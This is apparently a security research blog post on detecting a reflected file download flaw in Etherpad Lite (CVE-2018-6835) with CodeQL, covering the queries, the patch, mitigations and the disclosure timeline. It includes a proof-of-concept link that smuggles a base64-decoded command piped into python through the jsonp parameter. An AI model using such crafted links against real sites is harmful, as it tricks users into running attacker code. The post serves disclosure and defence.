Etherpad reflected file download: Vulnerability hunting with CodeQL (CVE-2018-6835)

In this post I’ll explain how we can detect a type of vulnerability known as reflected file download (RFD) using CodeQL. As an example, I’ll use a vulnerability that I recently reported in the popular collaborative online editor Etherpad.

Details of the vulnerability in Etherpad (CVE-2018-6835)

This vulnerability affects versions of Etherpad Lite prior to 1.6.3 and is caused by missing sanitization of the name of the JSONP callback function used in the HTTP API. This allows an attacker to craft a URL that, when visited, triggers the download of an executable file that appears to originate from the host of the Etherpad application. The vulnerability has been assigned CVE-2018-6835.

Reflected file download (RFD)

Reflected file download (RFD) is a relatively new attack vector discovered in 2014 by Oren Hafif. It has since affected multiple organizations and applications, including Google. The attack works much like the more familiar cross-site scripting (XSS): both rely on the victim clicking a link that points to a trusted domain. In the case of RFD, instead of running JavaScript in the victim’s browser, an executable file will be offered to the user as a download. As the file appears to originate from a trusted domain, the victim may then think that it is safe to run the file. The main ingredients in an RFD vulnerability are:

User input in the URL being reflected back in the response.
The vulnerable URL is permissive and allows the file name to be manipulated.

If the vulnerable application serves its output using a Content-Disposition: attachment HTTP header, a user’s browser will automatically offer the injected content as a downloadable file. If the filename attribute in this header is not set, then the file name and extension can be manipulated by the attacker to make the file executable on some platforms. If the Content-Disposition: attachment header is not provided by the application, an attacker could craft the link using the download attribute in order to force the user’s browser to treat the injected content as a download, and set the filename. For example:

<a href="http://example.com/specially-crafted-URL" download="RunMe.bat">You can trust this link</a>

Using CodeQL to find the RFD vulnerability in Etherpad

Let’s take a look at the vulnerability in Etherpad.

Using CodeQL, we can look for user input being reflected back in the server’s response. To begin with, we’ll search for functions that are likely to be handlers of HTTP requests. In JavaScript, it is fairly common to name the variable that represents a request req and the variable that represents a response res. A function that handles a request will normally take these as parameters. The CodeQL library for JavaScript analysis provides a Function class to model functions. To start our exploration we can extend that Function class in order to find functions whose first two parameters are named req and res:

class LikelyRouteHandler extends Function {
  Variable req;
  Variable res;

  LikelyRouteHandler() {
    req = getParameter(0).(SimpleParameter).getVariable() and req.getName() = "req" and
    res = getParameter(1).(SimpleParameter).getVariable() and res.getName() = "res"
  }
}
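For illustration, here is a pair of hypothetical handlers (not taken from Etherpad) showing what this name-based heuristic would and would not match. The names greet, greetRenamed and makeFakeResponse are made up for this sketch, and the fake response object only stands in for a real HTTP response so that the snippet runs without a server.

```javascript
// Hypothetical handlers, not taken from Etherpad.

// Matched by LikelyRouteHandler: the first two parameters are simple
// parameters named `req` and `res`.
function greet(req, res) {
  res.send('Hello ' + req.query.name);
}

// Not matched: same logic, but the parameters have different names,
// so a purely name-based heuristic misses this function.
function greetRenamed(request, response) {
  response.send('Hello ' + request.query.name);
}

// Minimal stand-in for a response object that records what was sent.
function makeFakeResponse() {
  return {
    body: null,
    send(payload) { this.body = payload; }
  };
}

const fakeRes = makeFakeResponse();
greet({ query: { name: 'world' } }, fakeRes);
console.log(fakeRes.body);
```

Both functions reflect user input in exactly the same way, which is a reminder that the heuristic trades completeness for simplicity.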

Running a query that looks for such functions gives me 37 results, so let’s try to make the query more specific. If the variable res in these functions is indeed an HTTP response, then its send method will be called to send the response to the browser. Using CodeQL we can track the flow of data from req and find where it is used as an argument of this send method. As is the case with Java and C++ queries, this can be achieved through CodeQL’s DataFlow library. Before we move on to that part, let’s add some methods to the LikelyRouteHandler definition to enable us to look for accesses to the req parameter, as well as calls to the send method of res.

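  // Gets the variable that holds the request (the `req` parameter).
  Variable getRequestVariable() { result = req }

  // Gets a method of `res` that sends an HTTP response.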
  string getASendMethodName() {
    // res.send
    result = "send"
    or
    // or a method `m` such that there is an assignment `res.m = res.n` where `n`
    // is already known to be a send method
    exists (DataFlow::PropWrite pwn |
      pwn.getBase().asExpr() = res.getAnAccess() and
      pwn.getPropertyName() = result and
      pwn.getRhs().asExpr() = getASendMethodReference()
    )
  }

  // Gets a reference to `res.send` or some other known send method
  PropAccess getASendMethodReference() {
    result.getBase() = res.getAnAccess() and
    result.getPropertyName() = getASendMethodName()
  }

In the above code snippet, getASendMethodName looks for methods that are either simply called send, or methods that are assigned res.send (further down, I’ll describe why this is important!). For example:

res.send2 = res.send  // flag up `send2` as well
res.send3 = res.send2 // flag up `send3` as well

So, if we have res.someMethod = referenceToSend then res.someMethod is also a send method. In the QL language, the left hand side is identified as:

// Base of the property write is an access to the variable `res`
pwn.getBase().asExpr() = res.getAnAccess() and
// The name of the property should also be identified
pwn.getPropertyName() = result

The right hand side is given by getASendMethodReference. A send method reference is a property access on res whose name is already known to be a send method name. We therefore define it as:

// Gets a reference to `res.send` or some other known send method
PropAccess getASendMethodReference() {
  result.getBase() = res.getAnAccess() and
  // Its name should already be a send method name
  result.getPropertyName() = getASendMethodName()
}

With this definition it becomes easy to identify calls to the send methods:

// Gets a call to the send method
CallExpr getASendMethodCall() {
  result.getCallee() = getASendMethodReference()
}

Running a query to look for calls to the send method results in some interesting function names in Etherpad. It was worth taking the effort to look for assignments that use the send method!

We are now in a position to use CodeQL’s DataFlow library to track the flow between the request and the response in JavaScript code. Apart from the general data flow configuration, the JavaScript library also comes with some specialized taint tracking configurations. For tracking reflected user input, the ReflectedXss::Configuration, ReflectedXss::Source and ReflectedXss::Sink classes in semmle.javascript.security.dataflow.ReflectedXss are exactly what we need.

Before looking at the details, let’s take a step back and summarize what we’re trying to find. We’re looking for:

a method that handles requests and responses (using LikelyRouteHandler), that
has a parameter req containing potentially tainted data provided by the user, which
flows back into the response sent back to the user using a send method (or any alias)

In DataFlow terminology: we need to define the req parameter provided to a LikelyRouteHandler as a Data Flow source, and any argument to the send method as a Data Flow sink. We can extend the ReflectedXss::Source and ReflectedXss::Sink QL classes to achieve that:

// An argument passed to `res.send`, marked as an XSS sink
class LikelySendArgument extends ReflectedXss::Sink {
  LikelySendArgument() {
    asExpr() = any(LikelyRouteHandler rh).getASendMethodCall().getAnArgument()
  }
}

// An access to a request parameter, marked as an XSS source
class LikelyRequestParameter extends ReflectedXss::Source {
  LikelyRequestParameter() {
    exists (Expr base | base = asExpr().(PropAccess).getBase() |
      // either a property access on `req` itself
      base = any(LikelyRouteHandler rh).getRequestVariable().getAnAccess()
      or
      // or a more deeply nested property access
      base = any(LikelyRequestParameter p).asExpr()
    )
  }
}

The last step is to combine these definitions with a standard Data Flow query:

from ReflectedXss::Configuration xss, DataFlow::Node source, DataFlow::Node sink
where xss.hasFlow(source, sink)
select sink, "Cross-site scripting vulnerability due to $@.",
       source, "user-provided value"

Running the query on Etherpad using the LGTM query console returns three results. Closer inspection reveals that the results in apicalls.js are of particular interest: the JSONP callback name provided by the user is part of the response.

Testing on Etherpad Lite 1.6.2 reveals that indeed no input validation is performed on the jsonp parameter. For example:

[Image: jsonp]

(Note that the above query results are actually for a patched version of Etherpad. The vulnerability was patched by introducing a check: isValidJSONPName, which can actually be seen in the query results.)
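The pattern flagged by the query can be sketched as follows. This is a simplified, hypothetical handler, not Etherpad’s actual code: the function name handleApiCall and the fake request and response objects are assumptions made for illustration. It shows how an unvalidated jsonp parameter ends up verbatim at the start of the response body.

```javascript
// Hypothetical, simplified JSONP handler (not Etherpad's actual code).
function handleApiCall(req, res) {
  const payload = JSON.stringify({ code: 3, message: 'no such function', data: null });
  const callback = req.query.jsonp;
  if (callback) {
    // Source: req.query.jsonp. Sink: the argument of res.send.
    // Nothing validates the callback name in between, so the caller
    // controls the first bytes of the response.
    res.send(callback + '(' + payload + ')');
  } else {
    res.send(payload);
  }
}

// Fake response object that records the body instead of sending it.
const captured = { body: null, send(body) { this.body = body; } };
handleApiCall({ query: { jsonp: 'echo pwned||' } }, captured);
console.log(captured.body);
```

In the query’s terms, req.query.jsonp is a LikelyRequestParameter and the string passed to res.send is a LikelySendArgument.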

Crafting an RFD exploit

Now that we have identified the unsanitized reflection, let’s try to create a malicious download link like those described by David Vassallo.

<a href="http://localhost:9001/api/1/test.sh?jsonp=echo cHJpbnQgJ0hlbGxvIFdvcmxkJwpwcmludCAncGF3bmQgOignCg==| base64 --decode | python||" download>Etherpad patch</a>

Note that test.sh in the URL above does not exist on the server, but Etherpad will still present an unsuspecting user with a downloadable file named test.sh upon visiting that URL:

[Image: download]

The download appears to originate from the host of our Etherpad instance (in our case: localhost:9001). The user may therefore think that the file can be trusted. The file contains the following Bash script:

echo cHJpbnQgJ0hlbGxvIFdvcmxkJwpwcmludCAncGF3bmQgOignCg==| base64 --decode | python||({"code":3,"message":"no such function","data":null})

The last bit is a JSONP artifact that is not used when Bash executes test.sh. The base64-encoded string is a Python script that does the following:

print 'Hello World'
print 'pawnd :('
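The decoding step can be checked without running the payload. The following Node.js sketch decodes the base64 string from the crafted link using the built-in Buffer API and prints the embedded script; the variable names are chosen for this example only.

```javascript
// Decode the base64 payload from the crafted link without executing it.
const encoded = 'cHJpbnQgJ0hlbGxvIFdvcmxkJwpwcmludCAncGF3bmQgOignCg==';
const decoded = Buffer.from(encoded, 'base64').toString('utf8');
console.log(decoded);
```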

The exploit works fully in Chrome. In Internet Explorer and Edge, the downloaded file is called test.json, because the browser changes the file extension based on the JSON response type. Firefox, on the other hand, does not offer any file to download at all.

Patch

As I mentioned before, Etherpad patched the vulnerability. Initially, they added a check using the isVarName function from the is-var-name module, but later on they switched to their own sanitizer, isValidJSONPName.

The DataFlow libraries allow for sanitizers like these to be taken into account: instances of tainted data flowing from a source to a sink via a sanitizer can be filtered out, so that they do not appear in the query results.

To do so, we simply extend the QL class TaintTracking::AdditionalSanitizerGuardNode and override the sanitizes predicate:

class IsValidJSONPSanitizer extends TaintTracking::AdditionalSanitizerGuardNode, DataFlow::CallNode {
  IsValidJSONPSanitizer() {
    this = DataFlow::moduleMember("./isValidJSONPName", "check").getACall()
  }

  override predicate appliesTo(TaintTracking::Configuration cfg) {
    cfg instanceof ReflectedXss::Configuration
  }

  override predicate sanitizes(boolean outcome, Expr e) {
    outcome = true and
    e = getArgument(0).asExpr()
  }
}

Running the new query produces the expected result: the vulnerability is no longer flagged up.

Mitigation for RFD in general

To protect yourself (and your users) from reflected file downloads, make sure to:

Sanitize user input that is reflected into the response.
Use exact URL mapping and remove support for path parameters when possible.
Set a fixed file name when using the Content-Disposition header.
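The first and third points can be sketched in a few lines of JavaScript. This is a minimal illustration under stated assumptions, not Etherpad’s isValidJSONPName implementation: the helper names isSafeCallbackName and sendJsonp, the conservative identifier pattern, the length limit and the file name response.json are all hypothetical.

```javascript
// Hypothetical allow-list: plain identifiers, optionally dot-separated.
const SAFE_CALLBACK = /^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;

// Returns true only for short, identifier-like callback names.
function isSafeCallbackName(name) {
  return typeof name === 'string' && name.length <= 64 && SAFE_CALLBACK.test(name);
}

// Sends `data` as JSON, or as JSONP when a valid callback name is given.
function sendJsonp(req, res, data) {
  const payload = JSON.stringify(data);
  const callback = req.query.jsonp;
  // Fixed file name, so the URL path cannot choose the name or extension.
  res.setHeader('Content-Disposition', 'attachment; filename="response.json"');
  if (callback === undefined) {
    res.send(payload);
    return;
  }
  if (!isSafeCallbackName(callback)) {
    // Reject instead of reflecting the attacker-controlled value.
    res.statusCode = 400;
    res.send('invalid callback');
    return;
  }
  res.send(callback + '(' + payload + ')');
}

// Fake response object, so the sketch runs without a server.
const demoRes = {
  headers: {}, statusCode: 200, body: null,
  setHeader(name, value) { this.headers[name] = value; },
  send(body) { this.body = body; }
};
sendJsonp({ query: { jsonp: 'echo pwned||' } }, demoRes, { ok: true });
console.log(demoRes.statusCode, demoRes.body);
```

An allow-list is used here rather than stripping suspicious characters, because it is easier to reason about what can reach the response.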

Disclosure timeline of CVE-2018-6835

29 Jan 2018: Initial private disclosure to John McLear of Etherpad.
3 Feb 2018: Patched version (1.6.3) released.

Note: Post originally published on LGTM.com on March 29, 2018